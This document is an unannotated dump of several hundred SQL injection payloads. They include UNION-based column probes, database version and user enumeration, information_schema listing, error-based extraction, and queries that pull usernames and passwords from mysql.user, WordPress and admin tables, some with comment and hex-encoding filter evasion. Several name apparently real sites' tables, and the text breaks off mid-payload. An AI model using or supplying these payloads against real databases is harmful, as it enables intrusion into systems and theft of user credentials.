1,version(),database(),4,5,user(),7,8,9/* 13 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,User()),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 LIMIT 1,1-- -13' union select concat(user(),0x3a,database(),0x3a,version())/* -13 union select concat(version(),0x3a,database(),0x3a,user()),2,3,4/* -13 union select concat_ws(0x3a3a,version(),user(),database()),2/* -13 union select concat_ws(0x3a,username,password,email_address),2,3 from clienti/* -13 union select concat_ws(0x3a,version(),database(),user())-- -13' union select concat_ws(0x3a,version(),database(),user()) -- 13 union select group_concat(0x3a3a,admin_username,0x3a,admin_password) from administrators -- -13 union select group_concat(username,0x3a,password),2,3 from users/* -13 union select memberlogin,memberpassword from Members-- -13 union select null,version() -13/**//*!union*//**//*!select*//**/user(),2,3,4,5,6-- 13 union select user,2,3,password,host,6,7,8,9,10,11,12,13 from mysql.user/* -13 union select version() -- -13 Union select Version() ## 13` where id=-1 union select 1,2,3,concat_ws(0x3a,user(),version()),5,6,7 -- 1402.310 and 1=2 union select 1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8,9,10,11,12,13,14-- 140246 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -1404 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,user,host,file_priv),26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 from mysql.user-- -14066 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8 -- 1407 UNION SELECT 0,1,2,3,4,5,6,7,concat_ws(0x0b,user(),version(),database()),9,10,11 LIMIT 1,1 -1407 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from mysql.user -- 140 and 1=9 union select 1,version(),3,4,5,6,7,8,9,10 -140 UNION ALL SELECT from information_schema.tables whe re table_schema=0x68656c6c6f776f725f68656c6c6f -- -140' union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10/* -140 union select 1,2,3,4,5,version(),7/ -140 union select 1,2,3,4,unhex(hex(version())),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52/* 140 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT CONCAT(username,0x3a,password,0x3a,email) FROM janera.nljr_bousers LIMIT 3,1),0x3a),0x71),0x71),4,5,6,7,8-- -140 union select 1,2,user(),database(),5,6,7,8,9,10,11,12,13/* -140 union select 1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from tbl_users-- 141137 union select cast(version()asint) from pg_user -1412 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13-- -1414 UNION SELECT 1,2,upwd,4,5,6,7,8,9,ulogin,11,12,13,14,15,16,17,18,19,20,21,uname,23,24,25,26,27 FROM users/* -1414 union select 1,concat_ws(0x3a3a,autId,autNombre,autApellidos,autUrl),3,4,5,6,7,8,9,10,11,12,13 from Autor -- -14166076 union select 0,2,3,password,5,6,7,8,9,0,0,2,3,4,5,6,7,8 from users/* -1416 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,0,11,12,13,14,15 -- 1417' union select 1,2,3,4,5 from email/* -1417 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42-- 1419' and 1=0 union select 1,2,3,group_concat(table_name separator '
'),5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=0x76736d706f-- -141 union select 1,2,3,4,5,6,7,8,9,id from admin_total -- -141 union select 1,2,3,4,5,6,7,8,9,table_name,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 from information_schema.tables limit 50,1/* -141 union select 1,2,3,4,5,6,7,concat(user,0x3a,password,0x3a,file_priv,0x3a,host),version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87 from mysql.user-- -141 union select 1,2,3,4,group_concat(User,0x3a,Password),6,7,8,9,10,11,12,13 FROM mysql.user-- -141 union select 1,2,3,concat_ws(0x2a,database(),version(),user(),@@version_compile_os) -141 UNION SELECT 1,2,concat(char(64,64),user,char(58),password,char(64,64)),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM mysql.user/* -141 union select 1,2,concat(username,char(58),password,char(58),email),4 from mos_users/* -141 union select 1,2,concat_ws(0x3a,nick,icq,email),4,5,6,7,8,9,10,11 from gs_authors -- -141 union select 1,concat_ws(0x3a,version(),user()),3,4,5,6,7-- -1420259 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7-- -14209 union select 1,2,3,4,5,6,7,8,concat(user(),version(),database()),10,11,12,13,14,15,16,17 -- -1421 UNION SELECT 1,convert(concat_ws(0x3a,version(),database(),user()) using latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 -14227 union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76_ CA LA SOMARA Arzachena Hotel 1422 and 1=0 union select 1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9,10,11 from admin-- -1425 union select concat_ws(0x3a,user(),version(),database()),2,3,4,5 -- -1428 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23,24,25,26,27,28,29,30,31,32,33-- -14298 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13 142 and 1=0 union select 1,2,version(),4,5,6,7-- 142' and 1=0 Union Select concat_ws(0x3a,version(),user(),database())-- 142 and '/*' Union(Select 1,2,version(),4,5,6 From information_schema.columns)-- -142 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(table_schema,0x3a,table_name,0x3a,column_name),17,18 from information_schema.columns limit 191,1/* 142 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 -- -142 union select 1,2,3,4,version(),6,7,8,9,0,11,12,13,14/* -142 union select 1,2,3,4,version(),6,7,8,9,10-- -142 union select 1,2,concat_ws(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from users -- -142 UNION SELECT 1,2,concat_ws(0x3a,user(),version(),database())-- -142 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38-- -142 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from c_admin_user -- -142 union select 1,table_name,3,4,5,6,7,8 from information_schema.tables limit 39,1 -1433 union select 1,2,3,4,5,6,7,8,concat_ws(0x20,id,email,login,senha),10,11,12,13,14,15,16,17 from tbUsuarios-- -1433 union select 1,2,concat_ws(0x20,us_id,us_user,us_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from usuario-- 1434 and 1=2 union select 1,version(),3,concat_ws(0x3a,User(),Database(),Version()) from information_schema.tables-- -1434 union select 1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables -- -1436 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6 -- -1436 union select 1,2 from "table" 1437 union select 1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7,8 limit 1,1-- 14380586 and user()<>1 143 and 1=2 union select 1,2,3,concat_ws(0x3a,adminname,adminpass),5 from w_admin-- 143 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,concat_ws(0x3a,version(),database(),useR()),71,72,73,74 -143 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9-- -143 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -143 union select 1,2,3,user(),version(),database(),7,8,9/* 143 union select 1,2,concat_ws(0x3a,version(),database(),user(),@version_compile_os),4,5-- -143 union select 1,2,passw,4,5,6,7 from admin/* -143 union select version(),2,3,4,5,6,7,8,9,0,1,12/* 1440' union select 1,version(),3,4,5,6,7-- -14411 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* -1443 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),useR()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 -1444 and 1=2 union select 1,2,3,4,concat_ws(char(58),@@version,user(),database(),@@version_compile_os) -- 1444'union select 0,1,2,3,4 from users/* -1444 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17 -- -14470 union select 1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/* 1447 union select 1,2,TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14,version(),16 FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1-- -144965 union select concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os)-- -144 union select 1,2,3,4,5,6,7,8,version(),10,11-- -144 union select 1,2,3,4,version()-- -144 union select 1,2,3,concat(id,0x2a,pass),5,6,7,8,9 from mail -144 union select 1,2,convert(version() using latin1),4 -- -144 union select 1,concat_ws(0x3c42523e,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15 -- -144 union select concat_ws(0x3a3a,kd_us,name,mail,city,pass,rnd,f_sh,ur_dost),2,3,4 from forum_users limit 1,1 -- -14521 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 1452 and 1=0 union select group_concat(table_name,0x3a,column_name),222 from information_schema.columns where column_name like 0x257061737325-- -1452 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,concat_ws(0x3a,user(),version(),database()),36,37,38,39 1453 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 1453 union select 1,2,3,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS/* -1453 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9,10-- 14572 and 1=0 union select 1,2,user(),version(),5,6,7,8,database()-- -14572 union select 1,2,3,4,5,concat_ws(0x20,version(),user(),database()),7 from guncel 145 and 1=0 UNION SELECT 1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20 145' and 1=0 union select concat_ws(0x3a,name,pass),2 froM users-- -145 union select 1,2,3,4,concat(auth_user,0x3a,auth_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 FROM authors where auth_status=0x61646d696e/* -145 union select 1,2,3,4,concat(username,0x3a,password,0x3a,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 FROM ssp2g_admins/* -145 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13-- -145 union select 1,2,3,user(),5,6,7,1,1,1,1/* -1463 union select 1,2,3,4,concat(password,0x3a,email),6 from members/* -1465' union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15 -- -14677 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6-- -1467 union select 1,aes_decrypt(AES_ENCRYPT(concat(0x3a,passwd),char(40)),char(40)),version(),4,5,6,7 from users limit 0,1/* 1469' or (1,1)=(select count(0),concat((select concat(substring(nick,1,64),char(58),substring(pass,1,64)) from admin limit 0,1),floor(rand(0)*2))from(information_schema.tables) group by 2)-- -1469 union select 1,2,3,4,5,6,version(),8 -- 146 and 1=0 union select 1,2,3,4,5,6,7,version(),9,10,11-- 146 and substring(version(),1,1)=x -146 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),database(),user()),15,16,17,18,19,20,21-- -146 union select 1,2,3,4,5,6,7,version(),9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7/* -146' UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10,11,12-- 146 union select 1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9 -146 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16/* -146 union select 1,2,3,concat(0x2C,id,char(58),pseudo,char(58),password,char(58),droits,char(58),type,0x2C),5 from ltfv5_admin_membres-- -146 UNION SELECT 1,2,3,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),5,6,7,8,9,10,11,12,13,14,15 -- -146 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- 146 union select 1,2,group_concat(version(),0x3E3E3E3E,database(),0x3E3E3E3E,user()),4-- -146 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -146 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -146 UNION SELECT concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* -14702/**/UNION/**/SELECT/**/1,2,CONCAT(password,0x78,name),4,5,6,7 from users/* -1474 union select 1,2,3,4,concat_ws(0x40,user(),database(),version(),@@version_compile_os),6,7,8/* -14753978 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,1111111,12,13,14,15,16,17,18/* -1478 union Select 1,concat_ws(version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- -14796 union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from information_schema.tables limit 83,1-- 147 and 0 union select 1,version(),3,4,5,6,7,8,9,10-- 147 and 1=0 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9-- 147 and 147=-1 union select 1,concat(user,0x3a,password) from mysql.user/* 147 union select 1,2,3,4,5,version(),7,8,9,0/* -147 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7, -147 union select 1,2,concat_ws(0x3a3a,id,name,username,email,password,usertype),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from mos_users -- -147 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 from users limit 0,3/* -147 union select 1,concat(user,char(58),password),3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147 from mysql.user/* 147 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11 limit 1,1/* -1483 union select 1,2,table_name,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 from information_schema.tables/* 1484332 union select 1,2,3,4,unhex(hex(concat_ws(0x3a,version(),database(),user()))),6 limit 1,1/* -1486 union select 1,concat_ws(0x3a,login,password),3,4,5 from users/* -1487 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(user,0x20,password),22 from mysql.user-- 1488888 union select 1,2,3,concat_ws(0x3a3a,version(),user(),database())-- 148912345 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a3a,version(),user(),database()),19-- -14895 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15,16,17,18,19,20,21 -- 148 and 1=2 union select 1,2,version(),4,5,user(),7,8,9,10 -148) or 1 group by concat(@@version,floor(rand(0)*2)) having min(0) or 1 -- -148 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* -148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,concat_ws(0x3a,version(),database(),user()),35,36/* -148 union select 1,2,3,4,5,6,7,concat_ws(':',id,name,password,status),9,10,11,12,13 from _2.main_users-- -148 union select 1,2,3,4,5,concat_ws(0x3a,database(),version(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- -148 union select 1,2,3,4,5,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),7,8,9-- -148' union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -148 union select 1,2,3,unhex(hex(concat_ws(0x3a,version(),database(),user()))),5,6,7 -148 union select 1,concat(login,0x3a,password),3,4,5,6 from users/* -148 union select null,null,group_concat(table_name separator 0x3a) from information_schema.tables-- 149100 union select 1,2,3,4,5,6,concat_ws(0x3a,login,kod,email,gg,cos4),8,9,0,1,2,3,4,5,6 from members/* 1492 union select user(),database(),3,4,version(),6,7,8,9-- -1493 union select 1,2,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),4,5,6 -- -1495 union select 1,2,group_concat(ID,0x3a,USERNAME,0x3a,PASSW,0x3a,FNAME,0x3a,MNAME,0x3a,LNAME,0x3a,EMAIL,0x3a,AGENCY,0x3a,STATUS,0x3a,ROLEID),4,5,6,7,8 from users-- 14968 order by 5 -14968 union select 1,version(),3,4,5 -14979976727 union select 1,2,concat_ws(0x3,version(),user(),database()),4,5,6,7 -- 1498 UNION SELECT 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 14-999.9 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12-- 14-999.9 union select 1,version(),3,4,5,6,7,8 -- 149 AND 1=2 UNION SELECT 0,null,2-- 149 and 1=@@version -- -149 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(char(58),login,password,email),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from users/* -149 union select 1,2,3,4,5,6,group_concat(table_name),8 from information_schema.tables /* -149 union select 1,2,3,version(),5/* -149 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7 -- -149 UNION SELECT concat(username,0x3a,password),2 from users limit 0,1/* -149 UNION SELECT concat_ws(0x3a,version(),user(),database()),2 -- 14 and 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46-- 14 aNd 1=0 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- 14 and 1=0 union Select 1,2,group_concat(table_name separator 0x3c62723e) from information_schema.tables where table_schema=database() -- 14 and 1=0 Union Select 1,concat(version(),0x3a,user()),3-- 14 and 1=0 UnIon selECt 1,concat_ws(0x3a,id,login,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from krossovki_admin_users-- 14 and 1=0 union select concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from users-- -14 and 1=2 union select 1,2,3,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),5,6 -- 14 AND 1@i order by table_name LIMIT 1))),@o),3,4,5,6,7,8,9,0-- -159 union select 1,concat(username,0x20,password,0x20,email),3,4 from zebra_admin-- -159 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -159 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,43-- -159' union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14 -- 15 and 0=-1 union select email,2,3,4,5,null,7,8,9,10,11,12,13 from ic_subscribers limit 70,1/* 15 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,concat(version(),0x3a,user(),0x3a,database())-- 15' and 1=0 UnIon selECt 1,2,3,4,group_concat(table_name separator 0x3c62723e),6,7,8,9,10 from information_schema.tables where table_schema=database() -- 15 and 1=0 union select 1,2,3,concat_ws(0x3a,user_id,username,password),5,6 from ads_forum__users limit 0,1 -- 15' and 1=0 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9 -- 15 and 1=0 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8-- 15 and 1=0 union select 1,2,version(),4,5,6,7,8,9,10 15 and 1=0 union select 1,concat_ws(0x3a,id,login,pass),3,4 from host6526_7.briz_users_101 limit 0,1-- 15 and 1=0 UNION SELECT 1,version(),3,4,5,6,7,8 -- 15 and 1=0 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 -- 15) and 1=2 union select 1,concat(username,0x3a,password),3 from user where userid=1/* 15 and 1=2 union select concat_ws(0x3a,user(),version(),database())-- 15 and (ascii(substring(VERSION(),1,1))=51)/* 15 AND SUBSTRING(selectversion(),1,1)=4/* 15 and substring((select version()),1,1)=5 -15 union all select @@version,user()-- -15 UNION SELECT 0,1,2,3,concat_Ws(0x0b,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- -15 union select 0,1,2,concat_ws(0x3a,user_login,user_pass),4 from wp_users-- -15 union select 0,1,2,concat_ws(user_login,0x3a,user_pass),4 from wp_users-- -15 UNION SELECT 0,1,concat_Ws(0x0b,user(),database(),version()),3,4 -- -15 union select 1111,concat(version(),0x3a,database(),0x3a,user())-- -15 union select 1,2,3,4,5,67,8,/* 15 union select 1,2,3,4,5,6,7,8,9,10,11,12/* -15 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/* -15 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,version(),29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78/* -15 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a ,user(),database(),version()),14,15-- -15' union select 1,2,3,4,5,6,7,8,9,10,11 from information_schema.tables -- -15 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a,version(),user(),database()),12,13,14 -- -15 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16,17,18,19-- -15 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13,14 -- -15 union select 1,2,3,4,5,6,7,8,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),10,11,12,13,14,15,null,17-- -15 union select 1,2,3,4,5,6,7,concat_ws(0x3a,database(),version(),user()),9,10,11-- -15 union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15/* -15 union select 1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19-- -15 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8/* -15 union select 1,2,3,4,5 from users -- -15 union select 1,2,3,4,5,table_name,7,8,9,0 from information_schema.tables limit 17,1-- -15 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15/* -15 union select 1,2,3,4,5,version(),concat_ws(0x3a,user(),database()),8-- -15 union Select 1,2,3,4,concat_ws(0x2b,version(),user(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17 -- -15 union select 1,2,3,4,concat_ws(0x3a3a,login,pass),6,7 from users -- -15 union select 1,2,3,4,concat_ws(0x3a3a,login,pwd) from admin -- -15 ' UNION SELECT 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16,17 -- -15 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68 -- -15 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- 15 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),5,6,7,8,9,10,11,12 LIMIT 1,1 -15 UNION SELECT 1,2,3,cast(concat(table_name,0x3a,column_name) as binary) from information_schema.columns-- - 15 union select 1,2,3,concat(char(60,115,116,97,114,116,62),table_name,char(58),column_name,char(60,47,115,116,97,114,116,62)),5,6,7 from INFORMATION_SCHEMA.COLUMNS limit 0,1/* -15 union select 1,2,3,concat(user(),0x3a,version()),5,6/* -15 union select 1,2,3,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,version()),5,6,7/* -15 union select 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5/* -15 union select 1,2,3,concat_ws(0x2a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -15 union select 1,2,3,concat_ws(0x3a,database(),version(),user()),5-- -15 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17 -15 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17 -15 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14-- -15 UNION SELECT 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11/* -15 union select 1,2,concat(table_name,0x3a,column_name),4 from information_schema.columns/* -15 union select 1,2,concat(user(),0x3a,version()),4,5,6,7,8,9,10/* -15 union select 1,2,concat_Ws(0x3a3a,login,psw,nom,privilege),4 from utilisateur -- -15 union select 1,2,concat_ws(0x3A3a,name,password),4,5,6,7 from admin/* 15 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12-- -15' union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8/* -15 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14 -15 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* 15 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6 -- -15 union select 1,2,group_concat(table_name),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 from information_schema.tables -- -15 union select 1,2,group_concat(username,char(58),password),4,5,6,7,8 from admin-- -15' union select 1,2,load_file('/tmp/123.php'),4,5,6,7,8,9,10,11,12,13,14,15/* -15' union select 1,2,load_file('/tmp/123.php'),4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x2F,user,password) from mysql.user/* -15 UNION SELECT 1,2,password,4,username,6,7,8,9 FROM users/* -15 union select 1,2,unhex(hex(concat_ws(0x3a,user(),version(),database()))),4-- -15 union select 1,2,user(),4,5,6,7,8,9,10,11,12 -- -15 union select 1,2,username,passwd,5,6,7 from user -- -15 union select 